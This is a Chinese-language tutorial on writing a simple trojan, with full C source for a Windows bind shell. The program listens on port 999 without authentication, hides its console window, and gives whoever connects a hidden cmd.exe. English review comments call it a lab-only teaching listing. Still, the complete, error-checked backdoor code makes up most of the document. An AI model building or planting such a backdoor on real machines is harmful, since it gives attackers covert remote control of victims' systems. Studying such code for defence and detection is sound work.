实现一个简单的木马,一般需要客户端和服务端,为了便于实现,就用Windows自带的Telnet软件远程连接,服务端通过监听某个端口提供服务,类似于Telnet服务的后台程序。其服务端编程的基本原理如下:
2)打开一个通信通道(绑定某个端口)并告知本地主机,它在某一个地址上接收客户请求。利用socket(本例用WSASocket)和bind函数实现。
2)等待客户请求到达该端口。利用listen函数实现。
3)接收到客户端的连接请求后,接受该连接并得到一个新的套接字用于与该客户通信。利用accept函数实现。
4)返回第二步,接收另一客户请求。(本例代码没有循环,只处理第一个连接。)
5)关闭连接。利用closesocket函数实现。
使用到的函数顺序如下:
socket()—>bind()—>listen()—>accept()—>closesocket()
实现代码如下:
#pragma comment(lib,"ws2_32.lib")
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#include <winsock2.h>
#include <windows.h>
#define MasterPort 999 //定义监听端口
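/*
 * Minimal TCP "bind shell": listen on MasterPort, accept ONE client, and hand
 * that connection to a child cmd.exe as its stdin/stdout/stderr.
 *
 * SECURITY NOTE (review): the listener binds INADDR_ANY and performs no
 * authentication or encryption, so any peer that can reach the port gets an
 * interactive command shell with this process's privileges, in cleartext.
 * This is a teaching listing for an isolated lab host only.
 *
 * Returns 0 when the shell was spawned and has exited, 1 if any Winsock or
 * process-creation step fails. The original listing checked no return
 * values, so a failed bind()/accept() still spawned cmd.exe on an invalid
 * handle; every step is now checked and all sockets are closed on every path.
 */
int main(void)
{
    int rc = 1;
    WSADATA WSADa;
    struct sockaddr_in SockAddrin = {0};
    int AddrSize = sizeof(SockAddrin);
    SOCKET CSocket = INVALID_SOCKET;   /* listening socket */
    SOCKET SSocket = INVALID_SOCKET;   /* accepted client socket */
    PROCESS_INFORMATION Processinfo = {0};
    STARTUPINFO Startupinfo = {0};
    char szCMDPath[255];
    DWORD len;

    /* %COMSPEC% names the command interpreter (normally cmd.exe).
     * 0 => variable missing; >= buffer size => path was truncated. */
    len = GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));
    if (len == 0 || len >= sizeof(szCMDPath))
        return 1;

    /* Load Winsock 2.2 (0x202 in the original listing). */
    if (WSAStartup(MAKEWORD(2, 2), &WSADa) != 0)
        return 1;

    /* Listen on every local IPv4 address at MasterPort. */
    SockAddrin.sin_family = AF_INET;
    SockAddrin.sin_addr.s_addr = INADDR_ANY;
    SockAddrin.sin_port = htons(MasterPort);

    /* dwFlags = 0 gives a non-overlapped socket. NOTE(review): an overlapped
     * socket is generally not usable as an inherited std handle -- keep 0. */
    CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (CSocket == INVALID_SOCKET)
        goto cleanup;
    if (bind(CSocket, (struct sockaddr *)&SockAddrin, sizeof(SockAddrin)) == SOCKET_ERROR)
        goto cleanup;
    if (listen(CSocket, 1) == SOCKET_ERROR)
        goto cleanup;

    /* Block until the first client connects; only that one client is served. */
    SSocket = accept(CSocket, (struct sockaddr *)&SockAddrin, &AddrSize);
    if (SSocket == INVALID_SOCKET)
        goto cleanup;

    /* Use the connected socket as the child's three standard handles and hide
     * its console window (STARTF_USESHOWWINDOW + SW_HIDE). */
    Startupinfo.cb = sizeof(STARTUPINFO);
    Startupinfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    Startupinfo.wShowWindow = SW_HIDE;
    Startupinfo.hStdInput = (HANDLE)SSocket;
    Startupinfo.hStdOutput = (HANDLE)SSocket;
    Startupinfo.hStdError = (HANDLE)SSocket;

    /* No pipe is involved (the original comment said "anonymous pipe"): the
     * socket itself is the child's stdio, so bInheritHandles must be TRUE. */
    if (!CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL,
                       &Startupinfo, &Processinfo))
        goto cleanup;

    /* Keep the sockets open until the shell exits, then release its handles. */
    WaitForSingleObject(Processinfo.hProcess, INFINITE);
    CloseHandle(Processinfo.hThread);
    CloseHandle(Processinfo.hProcess);
    rc = 0;

cleanup:
    if (SSocket != INVALID_SOCKET)
        closesocket(SSocket);
    if (CSocket != INVALID_SOCKET)
        closesocket(CSocket);
    WSACleanup();
    return rc;
}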